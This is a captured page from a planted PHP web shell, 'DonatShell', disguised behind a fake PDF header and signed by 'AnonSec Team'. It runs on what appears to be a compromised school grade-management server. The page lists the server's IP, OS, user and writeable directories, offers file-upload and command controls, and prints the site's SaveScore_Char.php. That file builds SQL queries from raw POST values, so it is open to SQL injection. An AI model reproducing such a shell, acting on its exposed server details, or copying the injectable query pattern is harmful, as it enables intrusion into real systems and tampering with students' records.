%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 122.154.253.140  /  Your IP : 216.73.216.209
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/mis/teacher/subject_score_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/inetpub/wwwroot/mis/teacher/subject_score_v2/SaveScore_Char.php
<?PHP
include("conf.php");
// print_r($_POST);
// echo $_POST['PCLass'];
// exit();
$Modify =  $_SESSION["IDTeacher"] . "@" . date("Ymd#h:i:s");
// print_r($_POST);
// exit();
for ($i = 1; $i <= count($_POST['IDStudent']); $i++) {
  $tmpTerm = $_SESSION["Term"];
  //echo  iconv( "tis-620","utf-8", $_POST['PClass']);
  // if (strpos($_POST['PClass'], "ป") > -1) { 
  //   $tmpTerm = "_";
  // }
  // echo $tmpTerm;
  // exit();
  // if ($_SESSION["AYear"] == "2566" && $tmpTerm == "_") {
  //   $sql = "delete FROM dbo.TBStudentCharacter where RegYear='" . $_SESSION["AYear"] . "'  and IDStudent='" . $_POST['IDStudent'][$i] . "' and PSubjectCode='" . iconv("utf-8", "tis-620", $_POST['PSubjectCode']) . "' and ChNo_SubNo='" . $_POST['ChNo_SubNo'] . "'";
  //   $query = sqlsrv_query($conn, $sql);
  // }
  $sql = "SELECT IDStudent,RegYear,RegTerm,PSubjectCode,ChNo_SubNo,Score,PClass,PRoom FROM dbo.TBStudentCharacter where RegYear='" . $_SESSION["AYear"] . "' and RegTerm='" . $tmpTerm . "' and IDStudent='" . $_POST['IDStudent'][$i] . "' and PSubjectCode='" . iconv("utf-8", "tis-620", $_POST['PSubjectCode']) . "' and ChNo_SubNo='" . $_POST['ChNo_SubNo'] . "'";
  // echo $sql;
  // exit();
  $params = array();
  $options =  array("Scrollable" => SQLSRV_CURSOR_KEYSET);
  $stmt = sqlsrv_query($conn, $sql, $params, $options);
  $row_count = sqlsrv_num_rows($stmt);
  if ($row_count > 0) {
    $sql = "update TBStudentCharacter set Score=" . $_POST['Score'][$i] . " , PClass='" . iconv("utf-8", "tis-620", $_POST['PCLass']) . "' , PRoom ='" . $_POST['PRoom'] . "',Modify='" . $Modify . "' where RegYear='" . $_SESSION["AYear"] . "' and RegTerm='" . $tmpTerm . "' and IDStudent='" . $_POST['IDStudent'][$i] . "' and PSubjectCode='" . iconv("utf-8", "tis-620", $_POST['PSubjectCode']) . "' and ChNo_SubNo='" . $_POST['ChNo_SubNo'] . "'";
  } else {
    $sql = "insert into TBStudentCharacter (IDStudent,RegYear,RegTerm,PSubjectCode,ChNo_SubNo,Score,PClass,PRoom,Modify) values('" . $_POST['IDStudent'][$i] . "','" . $_SESSION["AYear"] . "','" . $tmpTerm . "','" . iconv("utf-8", "tis-620", $_POST['PSubjectCode']) . "','" . $_POST['ChNo_SubNo'] . "','" . $_POST['Score'][$i] . "','" . iconv("utf-8", "tis-620", $_POST['PCLass']) . "','" . $_POST['PRoom'] . "','" . $Modify . "')";
  }
  // if($_SESSION["IDTeacher"]=="804") { 
  //   //print_r($_POST);
  //   //echo strpos($_POST['PClass'], "ป");
  //   echo $sql . "<BR>";
  //   exit();
  // }
  $stmt = sqlsrv_query($conn, $sql);
  if ($stmt === false) {
    echo "<h3 class='text-danger'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้</h2>";
    exit();
    break;
  }
}
echo "<h3 class='text-success'>บันทึกคะแนนเสร็จสมบูรณ์...</h2>";
exit();

Anon7 - 2022
AnonSec Team